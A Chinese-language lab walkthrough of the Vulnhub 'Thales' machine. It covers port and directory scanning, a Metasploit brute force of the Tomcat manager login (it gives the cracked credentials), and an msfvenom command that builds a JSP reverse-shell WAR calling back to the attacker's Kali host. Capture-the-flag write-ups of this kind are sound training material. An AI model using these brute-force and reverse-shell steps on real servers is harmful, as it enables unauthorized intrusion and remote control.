当前位置: 首页 > news >正文

Vulnhub-Thales通关攻略

        第0步:网卡配置

                靶机端:将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式

                Kali端:将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only

       第一步:确定靶机IP

#靶机IP
192.168.56.101

#KaliIP
192.168.56.102
        第二步:扫描后台及开放端口

        第三步:添加端口8080进行敏感目录及文件扫描

+ http://192.168.56.101:8080/docs (CODE:302|SIZE:0)                               
+ http://192.168.56.101:8080/examples (CODE:302|SIZE:0)                      
+ http://192.168.56.101:8080/favicon.ico (CODE:200|SIZE:21630)
+ http://192.168.56.101:8080/host-manager (CODE:302|SIZE:0) 
+ http://192.168.56.101:8080/manager (CODE:302|SIZE:0) 
+ http://192.168.56.101:8080/shell (CODE:302|SIZE:0)             
        第四步:访问8080端口,发现是个tomcat页面,并发现登录窗口

        第五步: 使用msf爆破一下

#更换镜像源
sudo nano /etc/apt/sources.list
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

#安装msf
sudo apt install metasploit-framework

#启动msf
sudo msfconsole

#爆破tomcat
search tomcat login
use 0
show options
set rhosts 192.168.56.101
run

#用户名密码
tomcat:role1
        第六步:登录

        第七步:发现有可以上传war包的位置,准备反弹shell

#命令
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.102 LPORT=6666 -f war -o revshell.war
        第八步:在Kali开启监听

        第九步:部署war包并点击访问,成功反弹shell

                                                                                                                        FROM  IYU_

相关文章:

  • 第30周Java分布式入门 ThreadLocal
  • 无法打开... .exe进行写入 解决方法
  • vue中defineModel简化defineProps和defineEmits的用法
  • KofamKOALA:KEGG本地化注释
  • 无线安灯按钮盒汽车零部件工厂的故障告警与人员调度专家
  • 【干货,实战经验】nginx缓存问题
  • 程序员英语口语练习笔记
  • python dict转换成json格式
  • 深入解析Flink Kafka Connector的分布式流数据采集架构与底层实现
  • 2025最新版Ubuntu Server版本Ubuntu 24.04.2 LTS下载与安装-详细教程,细致到每一步都有说明
  • SAP 获取RFC的WSDL文件
  • react项目中当组件渲染的时候如何执行接口
  • 侯捷 C++ 课程学习笔记:现代 C++ 中的移动语义与完美转发深度解析
  • SQLark导出功能详解|轻松管理数据库数据与结构
  • 3.24[Q]Linux
  • 【MySQL】索引 事务
  • 【AI】NLP
  • [项目]基于FreeRTOS的STM32四轴飞行器: 十二.角速度加速度滤波
  • 《似锦》:曹兴昱—残暴和孝顺并不冲突家庭成长环境分析以命抵命逻辑悖论
  • MPC模型预测控制的数学定义与工程化
  • wordpress 视差滚动/河南seo推广
  • 网站目录做二级域名/怎么做表格
  • 网站前缀带wap的怎么做/app注册拉新平台
  • wordpress打不开/电脑上突然出现windows优化大师
  • 做网站公司名字/网站排名优化外包公司
  • 一个网站绑定两个域名/优化提升